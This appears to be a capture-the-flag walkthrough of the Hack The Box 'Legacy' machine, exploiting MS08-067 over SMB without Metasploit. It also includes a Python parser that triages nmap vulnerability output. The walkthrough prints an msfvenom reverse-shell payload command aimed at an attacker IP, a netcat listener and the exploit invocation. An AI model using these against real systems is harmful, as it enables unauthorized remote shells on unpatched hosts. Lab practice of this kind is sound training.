
# Hack The Box - Legacy Walkthrough without Metasploit

![Legacy](/files/-MP8vf-zNPaK0WLY8g56)

## Enumeration

We start by using nmap to enumerate the box with the following flags:

- `-sC`: script scan, equivalent to `--script=default`
- `-sV`: service version detection
- `-A`: enable OS detection, version detection, script scanning, and traceroute

```
nmap -sC -sV -A 10.10.10.4
```

![Legacy enumeration](/files/-MPAT9veiSFXsYLWS-gD)

SMB port 445 is open, so we can run nmap again with the SMB vulnerability scripts against that port; the OS detection output will be useful later.

```
nmap --script smb-vuln* -p445 10.10.10.4
```

Since there are several smb-vuln scripts, the trailing `*` wildcard runs all of them against port 445 of the target box.

![WannaCry Vulnerability](/files/-MPARP3l4kXZ8UBV3xRe)

It is vulnerable to CVE-2008-4250 (MS08-067), which affects the operating systems that the OS detection reported as most likely to be running on our target.
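To triage these scan results across many hosts, here is an added Python example (not part of the original walkthrough) that parses nmap's normal output for the smb-vuln scripts and lists which hosts reported `State: VULNERABLE` together with their CVE ids; the sample output below is constructed to mirror the scan above, not copied from a real run.

```python
import re
from collections import defaultdict

# Constructed sample of `nmap --script smb-vuln* -p445` normal output; not a real scan.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.10.4
Host script results:
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_smb-vuln-regsvc-dos: false
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
SCRIPT_RE = re.compile(r"^\|_?\s*(smb-vuln-[\w-]+):\s*(.*)$")
STATE_RE = re.compile(r"^\|\s+State:\s*(\S+)")
CVE_RE = re.compile(r"CVE:(CVE-\d{4}-\d+)")


def parse_smb_vuln(text):
    """Map each scanned host to its smb-vuln verdicts: {host: {script: {state, cves}}}."""
    results = defaultdict(dict)
    host = script = None
    for line in text.splitlines():
        if m := HOST_RE.match(line):
            host, script = m.group(1), None
        elif host and (m := SCRIPT_RE.match(line)):
            script = m.group(1)
            tail = m.group(2).strip()  # one-line verdicts ("false", NT_STATUS_...) sit here
            results[host][script] = {"state": tail.upper() or "UNKNOWN", "cves": []}
        elif script and (m := STATE_RE.match(line)):
            results[host][script]["state"] = m.group(1).upper()
        elif script and (m := CVE_RE.search(line)):
            results[host][script]["cves"].append(m.group(1))
    return dict(results)


def vulnerable_findings(text):
    """Flatten to (host, script, cves) for every script that reported State: VULNERABLE."""
    return [(host, script, r["cves"])
            for host, scripts in parse_smb_vuln(text).items()
            for script, r in scripts.items() if r["state"] == "VULNERABLE"]
```

Feed it the `-oN` output of a subnet-wide scan and the returned tuples give a patch list: any host still reporting MS08-067 or MS17-010 is an end-of-life SMBv1 system that should be isolated or decommissioned.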

### Finding the PoC

With a quick Google search we can find this GitHub repository:

#### <https://github.com/andyacer/ms08_067/>

It is a ready-made exploit script into which we place our own msfvenom payload before executing it to exploit the vulnerability.

### Modifying the PoC

The following command generates a reverse TCP shell payload for 32-bit Windows in C array format, avoiding the bad characters listed with the `-b` flag.

```
msfvenom -p windows/shell_reverse_tcp LHOST=<Attackers-IP> LPORT=<Attackers-Port> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
```

![PoC](/files/-MPAfJi9wyvOMc2P8sEr)

This part of the exploit (the embedded shellcode buffer) is the one we replace with our own msfvenom payload.

### Executing the PoC

First, we need a netcat listener already running in order to catch the reverse TCP shell.

```
nc -nvlp 443
```

![Netcat Listener](/files/-MPAxtQ5LoIJSCaf7Og3)

We might run into this problem while trying to execute the exploit:

![Missing libraries](/files/-MPAhKrJAuGAOVi3bVAQ)

To fix it we just need to install **Impacket** and **PyCrypto**.

For Impacket:

```
git clone https://github.com/SecureAuthCorp/impacket
cd impacket
pip install .
```

For PyCrypto:

```
pip install pycrypto
```

Once that is fixed we can run the exploit with the required arguments.

![Payload Options](/files/-MPAxIaxvJlrTRSTiB7M)

According to our previous enumeration, this box is most likely Windows XP SP3, so we tested with target option 6.

```
python ms08_067_2018.py 10.10.10.4 6 445
```

## Pwnd

![Own the box](/files/-MPAwheaQ45U3I5TJfbc)
